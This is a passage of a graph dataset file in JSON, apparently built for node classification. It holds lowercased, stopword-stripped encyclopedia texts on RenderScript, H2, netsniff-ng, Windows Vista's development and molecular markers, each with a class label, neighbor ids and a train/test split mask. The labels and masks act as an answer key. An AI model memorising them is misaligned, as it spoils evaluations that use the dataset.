      11247,
      3573,
      10229,
      5119
    ],
    "mask": "None"
  },
  {
    "node_id": 1578,
    "label": 2,
    "text": "RenderScript:renderscript renderscript component android operating system mobile devices offers api acceleration takes advantage heterogeneous hardware allows developers increase performance applications cost writing complex lower-level code provides developer three primary tools simple 3d rendering api compute api similar cuda c99-derived language renderscript added android 3.0 honeycomb android 4.1 renderscipt experimental 3d rendering api deprecated exists solely compute api android 4.2 added new capabilities script intrinsics blend blur well scriptgroups allow chain together related renderscript scripts execute one call recently google added filterscript subset renderscript allows developers write image processing operations filterscript using standard renderscript runtime api within stricter constraints ensure wider compatibility improved optimization across multi-core cpus gpus dsps filterscript less precise terms numeric datatype precision cross device compatible subset renderscript – mistaken renderscript replacement technology renderscript designed always run various android platforms regardless hardware type performance tuning done runtime renderscript portability depends upon device-specific drivers basic cpu-only driver provided every device exist specific chipset-provided renderscript drivers enable gpu usage e.g qualcomm specific drivers provided codice_1 android library renderscript designed tune tasks runtime efficiently split run concurrently underlying hardware android 4.2 renderscript expanded run gpu addition cpu supported systems",
    "neighbors": [
      5637,
      8719,
      3600,
      7700,
      9244,
      11294,
      5677,
      1083,
      6212,
      69,
      8262,
      4685,
      3664,
      8280,
      8285,
      2658,
      6268,
      11391,
      1670,
      5262,
      10393,
      7835,
      673,
      8870,
      1191,
      196,
      8907,
      8413,
      9949,
      1255,
      8940,
      1776,
      5892,
      7428,
      2828,
      5396,
      280,
      10009,
      10525,
      798,
      288,
      2852,
      8486,
      10537,
      3380,
      5431,
      2875,
      3900,
      10045,
      8514,
      11082,
      332,
      3409,
      9042,
      8019,
      2901,
      5467,
      3940,
      7548,
      4995,
      9610,
      10129,
      5522,
      1427,
      10645,
      2978,
      10658,
      1959,
      937,
      5546,
      6057,
      7595,
      2001,
      479,
      3043,
      1516,
      5100,
      5613,
      5620,
      11252,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 1579,
    "label": 1,
    "text": "H2_(DBMS):h2 dbms h2 relational database management system written java embedded java applications run client-server mode software available open source software mozilla public license 2.0 original eclipse public license subset sql structured query language standard supported main programming apis sql jdbc however database also supports using postgresql odbc driver acting like postgresql server possible create in-memory tables well disk-based tables tables persistent temporary index types hash table tree in-memory tables b-tree disk-based tables data manipulation operations transactional table level locking multiversion concurrency control implemented 2-phase commit protocol supported well standard api distributed transactions implemented security features database role based access rights encryption password using sha-256 data using aes tiny encryption algorithm xtea cryptographic features available functions inside database well ssl tls connections supported client-server mode well using console application two full text search implementations included native implementation one using lucene simple form high availability implemented used client-server mode database engine supports hot failover commonly known clustering however clustering mode must enabled manually failure database supports protection sql injection enforcing use parameterized statements h2 feature called 'disabling literals since version 1.1.111 h2 in-memory database run inside google app engine h2 documentation explains detail several ways problems underlying hardware particular power systems impact durability relational databases according h2 documentation problems related db engine design also storage caching mechanism storage devices use write cache order increase speed situation power failure data device cache lost administrators assess common trade speed data loss risks context business requirements must carefully consider design power supply ups critical servers possible cases force storage write cache frequently even immediately using fsync slows writing process one accept caching device buffer introduces risk data loss case power failure effectiveness using fsync limited fact many hdd write caching enabled factory default case nothing design settings database os level commands able completely eliminate chance lost inconsistent data event sudden power failure working os hardware settings disable caching write data real time significant impacts performance around 100 write operations per second would achievable using spinning disks h2 documentation makes effort describe detail potential problems durability part acid resulting potential data loss committed transactions case power failure considering hardware limitations regarding preservation data event sudden power loss ineffectiveness approaches commonly employed developers prevent sorts losses many database engines default call filedescriptor.sync filechannel.force fsync equivalents every commit significantly degrade system performance without significantly increasing durability hsqldb documentation references workarounds similar set issues documentation microsoft knowledge base describes impact issues power failures write caching etc performance durability knowledge base discusses trade offs performance vulnerability disk write caching well settings administrator use balance embedded web server browser based console application included well command line tools start stop server backup restore databases command line shell tool development h2 database engine started may 2004 first published december 2005 database engine written thomas mueller also developed java database engine hypersonic sql 2001 hypersonic sql project stopped hsqldb group formed continue work hypersonic sql code name h2 stands hypersonic 2 however h2 share code hypersonic sql hsqldb h2 built scratch",
    "neighbors": [
      899,
      3219,
      10389,
      1816,
      10137,
      10921,
      4781,
      5677,
      7983,
      10286,
      2737,
      10413,
      3636,
      5691,
      10048,
      3784,
      6986,
      6219,
      6993,
      10193,
      9177,
      8539,
      225,
      1383,
      5612,
      2413,
      7022,
      9471
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1580,
    "label": 4,
    "text": "Netsniff-ng:netsniff-ng netsniff-ng free linux network analyzer networking toolkit originally written daniel borkmann gain performance reached zero-copy mechanisms network packets rx_ring tx_ring linux kernel need copy packets kernel space user space via system calls recvmsg libpcap starting release 1.0.0 also supports zero-copy mechanism linux capturing rx_ring programs using libpcap also use mechanism linux netsniff-ng initially created network sniffer support linux kernel packet-mmap interface network packets later tools added make useful toolkit iproute2 suite instance kernel zero-copy interface efficient packet processing reached even commodity hardware instance gigabit ethernet wire-speed reached netsniff-ng trafgen netsniff-ng toolkit depend libpcap library moreover special operating system patches needed run toolkit netsniff-ng free software released terms gnu general public license version 2 toolkit currently consists network analyzer packet capturer replayer wire-rate traffic generator encrypted multiuser ip tunnel berkeley packet filter compiler networking statistic tools autonomous system trace route distribution specific packages available major operating system distributions debian fedora linux also added xplico network forensic toolkit grml linux securityonion network security toolkit netsniff-ng toolkit also used academia examples assumed eth0 used network interface programs netsniff-ng suite accept long options e.g. -- -i -- -o -- dev -d astraceroute -d eth0 -n -s -h host e.g. netsniff-ng.org ifpps -d eth0 -p trafgen -d eth0 -c trafgen.txf bpfc fubar.bpf flowtop netsniff-ng -i eth0 -o dump.pcap -s -b 0 netsniff-ng toolkit currently runs linux systems developers decline port microsoft windows",
    "neighbors": [
      2569,
      6797,
      5139,
      10016,
      6177,
      10788,
      1064,
      10924,
      7983,
      2228,
      5045,
      9142,
      823,
      6345,
      842,
      9939,
      6997,
      7895,
      5472,
      9440,
      11249,
      2292,
      5749,
      2045,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 1581,
    "label": 2,
    "text": "Development_of_Windows_Vista:development windows vista development windows vista occurred span five half years starting earnest may 2001 prior release microsoft windows xp operating system continuing november 2006 microsoft originally expected ship new version sometime late 2003 minor step windows xp codenamed whistler windows 7 codenamed blackcomb vienna vista original codename longhorn allusion plan whistler blackcomb large ski resorts british columbia longhorn name bar two mountains whistler visitors pass reach blackcomb gradually windows longhorn assimilated many important new features technologies slated blackcomb resulting release date pushed back times many microsoft developers also re-tasked improving security windows xp faced ongoing delays concerns feature creep microsoft announced august 27 2004 making significant changes longhorn development started afresh building windows server 2003 codebase re-incorporating features would intended actual operating system release previously announced features winfs ngscb dropped postponed longhorn named windows vista mid-2005 unprecedented beta-test program started involved hundreds thousands volunteers companies september 2005 october 2006 microsoft released regular community technology previews ctp beta testers two release candidates general public development windows vista came conclusion november 8 2006 announcement completion co-president windows development jim allchin early development stages longhorn generally characterized incremental improvements updates windows xp period microsoft fairly quiet worked marketing public relations focus strongly focused windows xp windows server 2003 released april 2003 occasional builds longhorn leaked onto popular file sharing networks irc bittorrent edonkey various newsgroups known builds prior first sanctioned development release longhorn may 2003 derived builds builds longhorn vista identified label always displayed bottom-right corner desktop typical build label would look like longhorn build 3663.lab06_n.020728-1728 higher build numbers n't automatically mean latest features every development team microsoft included typically team working certain feature subsystem would generate working builds developers would test code deemed stable changes would incorporated back main development tree microsoft number build labs exist compilation entirety windows performed team lab given build originated shown part build label date time build follows builds beta 1 beta 2 display build label version information dialog winver icons windows xp installing milestone 2 builds oobe setup process windows xp different music build 3663 build date july 28 2002 first known build leaked screenshots first sighting plex style microsoft regarded place-holder theme development versions ready demonstrate aero build 3670 build date august 19 2002 screenshots build showed variation device manager implemented inside windows explorer feature later appeared windows 7 build 3683 build date september 23 2002 leaked october 20 2002 first longhorn build leaked internet build first several working title longhorn xp professional visually significantly different windows xp one notable changes windows logo white colored like versions windows also templates documents pictures notably different well open save dialog boxes also included template incorporating aesthetic changes new user interface options new sidebar also present contained many gadgets would much later seen windows sidebar analog clock slide show search capability option version sidebar also made possible move start button disable traditional taskbar entirely early revision winfs also included little way user interface included appeared early testers nothing service consumed large amounts memory processor time display properties control panel first significant departure built new avalon api build 3706 build date october 29 2002 leaked may 22 2006 one first builds include desktop composition engine dce later became desktop window manager dwm build appeared internet long builds time period included several changes first reported part later milestone builds including internet explorer 6.05 plex theme build 3718 build date november 19 2002 leaked april 30 2004 included dce early hardware-accelerated alpha transparency transition effects demonstration dce capabilities programs literally flipped taskbar twisted minimized several months relatively little news activity microsoft longhorn build 4008 build date february 19 2003 made appearance internet around february 28 2003 also privately handed select group software developers evolutionary release build 3683 contained number small improvements including modified blue plex theme new simplified windows image-based installer operates graphical mode outset completed install operating system approximately one third time windows xp hardware optional new taskbar introduced thinner previous build displayed time differently notable visual functional difference however came windows explorer incorporation plex theme made blue dominant color entire application windows xp-style task pane almost completely replaced large horizontal pane appeared toolbars new search interface allowed filtering results searching windows help natural-language queries would used integrate winfs animated search characters also removed view modes also replaced single slider would resize icons real-time list thumbnail details mode depending slider file metadata also made visible easily editable active encouragement fill missing pieces information also note conversion windows explorer .net application build 4015 build date march 28 2003 leaked internet april 28 2003 number features microsoft working rolled build range parental controls also moved enlarged windows logo left side start button lot additional configurability sidebar including able put start bar bottom screen notion libraries later known virtual folders files libraries collected content around hard drive user could filter content save folder microsoft originally intended replace special shell folders documents music etc virtual folders however change deemed drastic dropped beta 1 release mid-2005 libraries later included windows 7 build also notable debut boot screen progress bar seen final release though 4015 version blue green new download manager shell location suggested internet explorer would get mozilla-style download manager though functionality apparent significant memory leak problems windows explorer sidebar made build difficult use resulted third-party hacks mitigate problem back-end database outlook express changed completely became dependent winfs store email winfs still significant performance memory usage issues became common testers disable winfs entirely thus rendering outlook express inoperative windows hardware engineering conference winhec conference may 2003 microsoft gave first public demonstrations new desktop window manager aero demonstrations done revised build 4015 never released number sessions developers hardware engineers conference focused new features well next-generation secure computing base previously known palladium time microsoft proposed solution creating secure computing environment also conference microsoft reiterated roadmap delivering longhorn pointing early 2005 release date build 4028 build date july 1 2003 first known server build based windows server.net rc1 later became windows server 2003 traditional client bits visual style look present disabled default build 4029 build date june 19 2003 leaked september 23 2003 build contained technologies new build 4015 windows explorer went number changes larger image video previews displayed tooltip mouse hovered file column-level filtering results introduced overall performance explorer somewhat improved build 4015 though memory leak issues entirely resolved also new analog clock user interface batch image processing images also introduced making possible user rotate number images build 4029 name displayed onghornlay rofessionalpay ersionvay 2003 pig latin longhorn professional version 2003 various places around operating system presumed screenshots build fake seemingly obvious mistake microsoft later explained merely test new code locate reduce number places operating system code name defined build 4033 build date july 17 2003 similar 4029 contained ui improvements including updated plex theme build 4039 build date august 27 2003 leaked august 22 2007 build includes phodeo 3d view displaying photos full dwm glass last build contain plex visual style build 4042 build date september 9 2003 probably earliest build slate theme lab06 instead plex theme winmain seen previous builds however aero glass build 4039 still present word removed computer network places build 4050 build date september 28 2003 shown teched 2004 israel one many 4050-numbered builds used microsoft demos notably 2003 professional developers conference official pdc 2003 build build date october 1 2003 build number 4051 released general public leak october 20 2003 introduced slate theme debuted 4042.lab06 build also contained updated version internet explorer version number 6.05 new features noted reviewers included download manager pop-up blocker add-on manager tool clear browsing history exception download manager eventually discarded features appeared builds internet explorer included preview builds windows xp service pack 2 months later windows sidebar enabled word start removed start button development used later windows vista build 4053 build date october 22 2003 leaked march 2 2004 minor changes build 4066 build date february 26 2004 although build identified server build contained many features ever seen associated desktop builds updated version phodeo included well sidebar mini-windows media player associated sidebar tiles functioning build desktop window manager jade theme build also replaced many xp icons new longhorn icons greatly resemble icons final version vista build leaked december 20 2008 may 2004 microsoft changed plans include next-generation secure computing base technology longhorn technology better known original code-name palladium garnered much criticism analysts security specialists researchers often cited advocates non-microsoft operating systems reason migrate preferred platform ross anderson example published paper collating many concerns criticisms part larger analysis trusted computing light large amount negative response analysts enterprise customers software developers microsoft shelved many aspects ngscb project indefinite period time aspect ngscb included final release operating system bitlocker make use trusted platform module chip facilitate secure startup full-drive encryption build 4067 build date february 12 2004 private beta shown jim allchin keynote winhec 2004 build 4074 build date april 25 2004 official winhec 2004 preview build leaked may 2004 build introduced improved jade theme although slate theme retained default also font segoe ui introduced jade theme also familiar pre-reset build build 4083 build date may 16 2004 – leaked november 10 2004 sidebar winfs dropped release considered highly unstable including absence programs start menu driver installation issues build 4093 build date august 19 2004 – one last builds compiled development reset considered highly unstable contained sidebar winfs avalon-based windows movie maker preliminary version windows anytime upgrade microsoft anna speech synthesizer avalon-based display properties control panel applet hidden \\windows\\system32 folder similar one build 3683 2004 become obvious windows team microsoft losing sight needed done complete next version windows ship customers internally microsoft employees describing longhorn project another cairo cairo.net referring cairo development project company embarked first half 1990s never resulted shipping operating system though nearly technologies developed time end windows 95 windows nt microsoft shocked 2005 apple release mac os x tiger offered limited subset features planned longhorn particular fast file searching integrated graphics sound processing appeared impressive reliability performance compared contemporary longhorn builds longhorn builds major explorer.exe system leaks prevented os performing well added confusion development teams later builds code developed failed reach stability september 23 2005 front-page article wall street journal microsoft co-president jim allchin overall responsibility development delivery windows explained development longhorn crashing ground due large part haphazard methods features introduced integrated core operating system without clear focus end-product december 2003 allchin enlisted help two senior executives brian valentine amitabh srivastava former experienced shipping software microsoft notably windows server 2003 latter spent career microsoft researching developing methods producing high-quality testing systems srivastava employed team core architects visually map entirety windows operating system proactively work towards development process would enforce high levels code quality reduce interdependencies components general make things worse vista things conjunction fact many microsoft skilled developers engineers working windows server 2003 led decision reset development longhorn building code would become windows server 2003 service pack 1 instead older windows.net server release candidate 1 build 3663 change announced internally microsoft employees august 26 2004 began earnest september though would take several months new development process build methodology would used development teams number complaints came individual developers bill gates new development process going prohibitively difficult work within changes build labs also resulted period time several months builds longhorn leaked onto internet build 3790.1232 build date august 19 2004 notable first build longhorn based server 2003 code base windows xp interface successive internal builds several months gradually integrated lot fundamental work done previous three years much stricter rules code could brought main builds builds period time described variously longhorn d1 milestone 8 9 depending whether new old build tree worked evidence similar build marked build 5000 built september 8 2004 also found build 5001 build date september 12 2004 windows longhorn build also windows xp interface wallpaper windows xp bull long horns boot screen also windows xp lh replacing xp lh represents longhorn build 5048 built april 1 2005 official winhec 2005 preview build described longhorn developer preview made available winhec attendees april 24 2005 build time period made available microsoft officially distributed outside winhec build quickly appeared file sharing networks aero visual style made first appearance build desktop window manager present disabled hidden default keynote presentation bill gates also announced many winfx developer apis originally planned exclusively longhorn going backported windows xp server 2003 final user interface longhorn would seen longer features device-independent resolutions rasterized icons virtual folders registry virtualization discussed well build 5048 closer resemblance windows xp prior longhorn builds 2003 2004 surprised many leading well-known windows enthusiast paul thurrott write thoughts positive positive painful build deal year waiting step back ways hope microsoft surprises sleeves makings train wreck months later thurrott stated vista development process since recovered recent builds build 5060 build date april 17 2005 major difference build 5048 except new style logon screen desktop wallpaper changed microsoft considered several names new operating system end microsoft chose windows vista confirmed july 22 2005 believing wonderful intersection product really windows stands resonates customers needs group project manager greg sullivan told paul thurrott— want pc adapt help cut clutter focus ’ important windows vista bringing clarity world reference three marketing points vista—clear connected confident focus matters microsoft co-president jim allchin also liked name saying vista creates right imagery new product capabilities inspires imagination possibilities done windows—making people ’ passions come alive windows vista beta 1 build 5112 build date july 20 2005 released july 27 2005 first longhorn build called windows vista available microsoft developer network msdn technet subscribers well select group microsoft beta testers compared winhec build released earlier year vista beta 1 large advancement introducing new user interface features windows shell drastically changed yet introducing virtual folders new search interface number new high-resolution icons revamped windows explorer interface away menus toolbar buttons present previous versions beta 1 also introduced many underlying technologies slated vista including new networking audio stacks parental controls fairly complete working build .net framework 3.0 still referred winfx build 5219 build date august 30 2005 microsoft started releasing regular community technical previews ctp beta testers less stability work made actual betas build 5219 also known ctp1 september ctp distributed among 2005 pdc attendees september 13 2005 released microsoft beta testers msdn subscribers first public ultimate edition build included super fetch although enabled default refresh saw return windows sidebar removed part development reset introduction desktop gadgets part microsoft gadgets line mini-applications microsoft stated intended make additional gadgets available download web site time build also supported new version windows media center code-named diamond although microsoft stated winfs make debut windows vista users build 5219 noticed winfs fact included version several windows 'rumor sites newsgroups neowin paul thurrott supersite windows speculated winfs would fact ready time windows vista release build 5231 build date october 4 2005 also known ctp2 october 2005 ctp released msdn subscribers microsoft beta testers october 17 2005 ultimate build introduced windows media player version 11 updated volume control utility added control volume level every running program build 5259 built november 17 2005 released microsoft technology adoption program tap members november 22 2005 originally announced released november 18 november ctp microsoft cancelled november ctp due instability however released build tap members sidebar temporarily removed build new ui changes including ability change color clarity ui windows antispyware soon windows defender integrated outlook express renamed windows mail idw build therefore gone ctp testing process leaked internet december 7 2005 december ctp built december 14 2005 build number 5270 released testers msdn december 19 2005 close feature complete since feature complete build delayed late january 2006 build windows antispyware renamed windows defender ie7 new icon/logo minor ui changes december ctp also last build windows vista supported bypassing wddm driver model requirement hence allowing desktop window manager uxss time build run using software vertex emulation change post 5270 builds well known keys 'usemachinecheck 'enablemachinecheck allow running desktop window manager software emulation mode february ctp built february 17 2006 build number 5308 released february 22 2006 first feature-complete ctp build meant enterprises also first build upgrade compatibility build according microsoft one feature appear next ctp customers see final release however later builds brought improvements previously expected unstaged revision made build released february 28 2006 build 5308.60 built february 23 released result windows server longhorn many issues february ctp also incorporated numerous virtual folders including attachments favorite music fresh tracks important e-mail last 7 days e-mail last 30 days documents last 30 days pictures videos recently changed shared unread e-mail user files intel developer forum march 9 2006 microsoft announced change plans support efi windows vista uefi 2.0 specification replaces efi 1.10 completed early 2006 time microsoft announcement firmware manufacturers completed production implementation could used testing result decision made postpone introduction uefi support windows support uefi 64-bit platforms postponed vista service pack 1 windows server 2008 32-bit uefi supported microsoft expect many systems built market moves 64-bit processors february ctp refresh built march 21 2006 build number 5342 released march 24 2006 build shipped technical beta testers corporate customers microsoft used testing board extensive feedback got february ctp described release external developer workstation intent providing interim build ctps microsoft claimed still track deliver next ctp second quarter build last beta 2 fork build included minor ui changes notably improvements media center new aero aurora effects faster setup process new sidebar gadgets slight improvements overall performance stability paint also slightly improved new screenshot snapping/saving tool included slightly redesigned network center build meet ctp quality measurements available ultimate edition 32-bit x86 64-bit x64 systems april edw built april 19 2006 build number 5365 released april 21 2006 introduced changes visual user interface elements behavior user account control number new backgrounds also introduced two new screensavers added well sidebar enabled default automatic defragmentation hard drive hold'em game shipped previous ctps dropped due apparent political sensitivity issues microsoft offers separate web download windows vista ultimate users windows vista beta 2 preview built may 1 2006 build number 5381 leaked may 2 2006 officially released may 6 2006 microsoft technical beta testers featured mostly performance tweaks minor changes compared build 5365 build microsoft entered beta 2 escrow windows vista beta 2 built may 18 2006 build number 5384 released microsoft developer network subscribers first since 5308 microsoft connect testers may 23 2006 conjunction bill gates keynote presentation winhec 2006 conference june 6 microsoft extended availability beta 2 users making vista available free download several languages web site technology web sites described release largest download event software history june microsoft made two significant changes plans windows vista one issue inclusion xml paper specification support vista microsoft office 2007 become major point dispute adobe systems first introduced may 2005 xps known time metro characterized pdf-killer adobe representative stated threatened addition longhorn however year later adobe changed stance saw inclusion new document format anti-competitive attack portable document format microsoft refused remove xps altogether noting core vista print spooling system offered ability system builders oems remove user-visible aspects document format operating system days later announced pc-to-pc sync would ship windows vista june 14 2006 windows developer philip su posted blog entry decried development process windows vista stating code way complicated pace coding tremendously slowed overbearing process. post also described windows vista approximately 50 million lines code 2,000 developers working product build 5456 build date june 20 2006 released june 24 2006 new features included revamped aero subsystem completely overhauled significantly less obtrusive user account control interface list view windows explorer brought back removed beta 1 microsoft developer ben betz later explained blog entry felt removing list mode made sense based usability research inability support windows explorer new grouping feature feature restored based great deal feedback beta testers release notes build state time zone bug plagued almost previous builds windows vista patched quite issues regional settings ime also resolved new windows aero mouse pointer scheme introduced introduced anti-aliasing mouse pointer first time many remaining windows xp-style icons replaced new icons disk space used clean installation also significantly reduced build 5472 build date july 13 2006 released july 17 2006 aside incorporating number bug fixes localization improvements build also introduced revised basic theme replaces gray theme seen previous builds light blue theme network center significantly revised well collating status information one place reducing number steps get configuration options desktop backgrounds icons introduced flip3d saw layout tweaks new windows aero mouse cursor set default build huge performance improvement beta 2 comparable possibly even faster windows xp demonstration speech recognition feature new windows vista microsoft financial analyst meeting july 27 2006 software recognized phrase dear mom dear aunt several failed attempts correct error sentence eventually became dear aunt let set double killer delete select developer vista speech recognition team later explained bug build vista causing microphone gain level set high resulting audio received speech recognition software incredibly distorted august 8 2006 microsoft security response center provided critical security fixes windows vista beta 2 making first microsoft product get security updates still beta build 5536 build date august 21 2006 released august 24 2006 august 29 august 31 first 100,000 users downloaded microsoft site among notable changes featured new ties windows live online services new icons welcome center minor updates aero appearance slightly bluish tint glass effect big speed improvements including setup speed many bug fixes tweaked anti-aliasing flip 3d feature released publicly august 29 2006 release candidate 1 rc1 built august 29 2006 build number 5600.16384 released select group beta testers september 1 2006 september 6 rc1 released msdn technet subscribers well registered customer preview program cpp members beta 2 pid september 14 microsoft re-opened cpp new members cpp ended november 26 2006 public release release candidate 1 resulted number extensive reviews analyses various technology news web sites immediately release weeks following ars technica ken fisher wrote performance improved significantly beta 2 suggesting faster machines may perform better windows xp also criticised usefulness windows sidebar continued intrusiveness user account control crn review noted five specific categories improvements release candidate 1 installation speed device driver support performance improvements several components security multimedia capabilities criticism vista user interface arose well chris pirillo describing near-final state sloppy build 5700 build date august 10 2006 first build rtm branch shown student day presentation microsoft tech-ed 2006 australia appeared run faster previous pre-rc1 build 5472 ui improvements higher build number necessarily indicate newer build microsoft began work rtm branch time wrapping rc1 branch allowing mainstream rc1 developers easily flow new development stage parallel development helps explain build 5700 older even pre-rc1 builds build 5728 build date september 17 2006 released september 22 2006 technical beta participants following day microsoft released 32-bit version build public 64-bit version arriving september 25 october 1 microsoft reached goals program participation longer offered build public response significant amount feedback rc1 testers 5728 contained many improvements one inclusion check box sound properties allowed user disable windows vista startup sound welcome center also improved new icons eliminating use one icon several different items old icons user folder replaced build microsoft neared goal vista installing 15 minutes reviewers reporting 5728 took little 16 minutes clean install however performing upgrade installation windows xp still slow sometimes taking hour complete release candidate 2 rc2 built october 3 2006 build number 5744.16384 released cpp members tap testers msdn/technet subscribers technical beta testers friday october 6 2006 available download october 9 aggressive development schedule final build would officially released general public testing nevertheless pre-release product keys work final rtm build several testers reported rc2 faster stable build 5728 however rc2 regular interim build major milestone name suggests rigorously tested rc1 rc1 may stable certain situations build fixed many compatibility issues plagued previous builds vista gui continued improved contained minor tweaks one prominent new ability customize color transparency maximized windows previous builds windows became predominantly black maximized effect could altered users control panel icon windows sideshow also added release manufacturing rtm build final version code shipped retailers distributors purpose pre-rtm build eliminate last show-stopper bugs may prevent code responsibly shipped customers well anything else consumers may find annoying thus unlikely major new features introduced instead work focus vista fit-and-finish days developers managed drop vista bug count 2470 september 22 1400 time rc2 shipped early october however still way go vista ready rtm microsoft internal processes required vista bug count drop 500 fewer product could go escrow rtm builds 32-bit versions released build 5808 build date october 12 2006 released tap testers october 19 2006 build notable first build released testers since microsoft entered rtm escrow build 5800 explains build numbers jumped 57xx 58xx build 5824 build date october 17 2006 released wide number internal testers later day hope build would become final rtm however catastrophic show-stopper bug found destroyed system upgraded windows xp completely reinstalling windows would fix computer build 5840 build date october 18 2006 made available internal testers according paul thurrott build contain major bug build 5824 testing produced positive feedback build contained large number new final icons well new set final wallpapers including new default wallpaper based aurora swoosh seen prior builds also last build feature windows xp sound scheme release manufacturing rtm built november 1 2006 build number 6000.16386 version windows vista ships customers microsoft announced build finalized november 8 2006 five years development rtm build number jumped 6000 reflect vista internal version number nt 6.0 jumping rtm build numbers common practice among consumer-oriented windows versions like windows 98 build 1998 windows 98 se build 2222 windows b.3000 windows xp b.2600 compared business-oriented versions like windows 2000 b.2195 server 2003 b.3790 november 16 2006 microsoft made final build available msdn technet plus subscribers business-oriented enterprise edition made available volume license customers november 30 windows vista launched general customer availability january 30 2007 service pack 1 beta released microsoft connect selected testers september 24 2007 build offered optionally windows update registry key installed tester key later leaked net resulting deactivation microsoft release build number vista jumped 6001.16659.070916-1443 build also removed group policy management console gpmc client computers replaced downloadable version later date also removed search menu option right hand bar start menu including option re-add start menu customization list build broke hp touch smart family applications also caused bugs resuming sleep cases rendered 64-bit pcs trusted platform module tpm chips unable finish booting build also contained unspecified improvements speed responsiveness os service pack 1 release candidate preview released microsoft connect selected testers november 12 2007 release build number vista increased 6001.17042.071107.1618 changes build covered microsoft connect non-disclosure agreement nda service pack 1 release candidate first released microsoft connect testers december 4 2007 build released msdn technet several weeks later days build released public officially microsoft download center public preview sp1 release build number vista increased 6001.17052.071129.2315 build contained number notable changes enhancements service pack 1 release candidate refresh released microsoft connect selected testers january 9 2008 released public january 11 2008 release build number 6001.17128.080101.1935 service pack 1 release candidate refresh 2 released microsoft connect selected testers january 24 2008- windows update release build number 6001.18000 details build covered microsoft connect non-disclosure agreement nda service pack 1 released manufacturing monday february 4 2008 final build service pack 1 went live tuesday march 18 2008 microsoft download center windows update build confirmed sources microsoft exactly code rc refresh 2 also giving exactly build number full build string release refresh 2 6001.18000.longhorn_rtm.080118-1840 build 6001.18063 release date june 24 2008 microsoft released kb952709 reliability performance update windows vista build notable two reasons first first publicly released update increases vista build number beyond 6001.18000 final build service pack 1 second build replaces 6001 longhorn _rtm.080118-1840 build string sp1 6001. vistasp1 _gdr.080425-1930 longhorn build string present early development vista seen official release build update reintroduced sp1 beta left sp1 released build marks removal release version vista contain longhorn codename prominent manner microsoft started work service pack 2 soon service pack 1 released windows server 2008 uses codebase windows vista service pack 1 service pack 2 first service pack released windows server 2008 windows vista simultaneously sharing binary windows vista service pack 2 pre-beta build number 6002.16489.lh_sp2beta.080924-1740 version 105 released october 2008 windows vista service pack 2 beta build number 6002.16497.081017-1605 version 113 released december 4 2008 download became available microsoft download center windows vista service pack 2 rc escrow build number 6002.16659.090114-1728 version 275 released january 2009 windows vista service pack 2 release candidate build number 6002.16670.090130-1715 version 286 released february 2009 windows vista service pack 2 rtm escrow build connect beta testers build number 6002.17043.090312-1835 version released march 2009 available installed via windows update windows vista service pack 2 rtm escrow build number 6002.17506.090313-1730 version released march 2009 leak file sharing websites windows vista service pack 2 rtm build number 6002.18005.090410-1830 released 28 april 2009 officially released microsoft via windows update 26 may 2009 – find build revision number windows vista windows server 2008 installed",
    "neighbors": [
      8576,
      641,
      5251,
      3463,
      651,
      6797,
      8080,
      3857,
      8976,
      10896,
      2196,
      11283,
      4505,
      9505,
      4130,
      4515,
      11301,
      3496,
      1577,
      6441,
      6697,
      2221,
      3250,
      3890,
      9983,
      1077,
      9910,
      6972,
      6462,
      7615,
      3648,
      321,
      7106,
      1348,
      582,
      8391,
      6088,
      1098,
      3916,
      3533,
      10957,
      3283,
      9173,
      11605,
      2391,
      3289,
      4316,
      8798,
      11103,
      4704,
      3425,
      5600,
      6114,
      10338,
      2919,
      8296,
      617,
      4074,
      2027,
      5225,
      8299,
      9448,
      5103,
      10989,
      7796,
      3573,
      6265,
      8315,
      636,
      639
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1582,
    "label": 4,
    "text": "Molecular_marker:molecular marker molecular marker molecule contained within sample taken organism biological markers matter used reveal certain characteristics respective source dna example molecular marker containing information genetic disorders genealogy evolutionary history life specific regions dna genetic markers used diagnosing autosomal recessive genetic disorder cystic fibrosis taxonomic affinity phylogenetics identity dna barcoding life forms known shed unique chemicals including dna environment evidence presence particular location biological markers like proteins used diagnostic tests complex neurodegenerative disorders alzheimer disease non-biological molecular markers also used example environmental studies genetics molecular marker identified genetic marker fragment dna associated certain location within genome molecular markers used molecular biology biotechnology identify particular sequence dna pool unknown dna many types genetic markers particular limitations strengths within genetic markers three different categories first generation markers second generation markers new generation markers types markers may also identify dominance co-dominance within genome identifying dominance co-dominance marker may help identify heterozygotes homozygotes within organism co-dominant markers beneficial identify one allele thus enabling someone follow particular trait mapping techniques markers allow amplification particular sequence within genome comparison analysis molecular markers effective identify abundance genetic linkage identifiable locations within chromosome able repeated verification identify small changes within mapping population enabling distinction mapping species allowing segregation traits identity identify particular locations chromosome allowing physical maps created lastly identify many alleles organism particular trait bi allelic poly allelic genomic markers mentioned particular strengths weakness consideration knowledge markers necessary use instance rapd marker dominant identifying one band distinction may sensitive reproducible results typically due conditions produced rapd used also assumption two samples share locus sample produced different markers may also require different amounts dna rapd may need 0.02ug dna rflp marker may require 10ug dna extracted produce identifiable results currently snp markers turned potential tool breeding programs several crops molecular mapping aids identifying location particular markers within genome two types maps may created analysis genetic material first physical map helps identify location chromosome well chromosome secondly linkage map identifies particular genes linked genes chromosome linkage map may identify distances genes using cm centimorgans unit measurement co-dominant markers used mapping identify particular locations within genome represent differences phenotype linkage markers help identify particular polymorphisms within genome polymorphisms indicate slight changes within genome may present nucleotide substitutions rearrangement sequence developing map beneficial identify several polymorphic distinctions two species well identify similar sequence two species using molecular markers study genetics particular crop must remembered markers restrictions first assessed genetic variability within organism studied analyze identifiable particular genomic sequence near candidate genes maps created determine distances genes differentiation species genetic markers aid development new novel traits put mass production novel traits identified using molecular markers maps particular traits color may controlled genes qualitative traits requires less 2 genes color identified using mas marker assisted selection desired marker found able followed within different filial generations identifiable marker may help follow particular traits interest crossing different genus species hopes transferring particular traits offspring one example using molecular markers identifying particular trait within plant fusarium head blight wheat fusarium head blight devastating disease cereal crops certain varieties offspring varieties may resistant disease resistance inferred particular gene followed using mas marker assisted selection qtl quantitative trait loci qtl identify particular variants within phenotypes traits typically identify goi gene interest located cross made sampling offspring may taken evaluated determine offspring inherited traits offspring type selection becoming beneficial breeders farmers reducing amount pesticides fungicides insecticides another way insert goi mechanical bacterial transmission difficult may save time money 5 applications fisheries aquaculture biochemical markers generally protein marker based change sequence amino acids protein molecule important protein marker alloenzyme alloenzymes variant forms enzyme coded different alleles locus alloenzymes differs species species detecting variation alloenzymes used markers type-i markers advantages 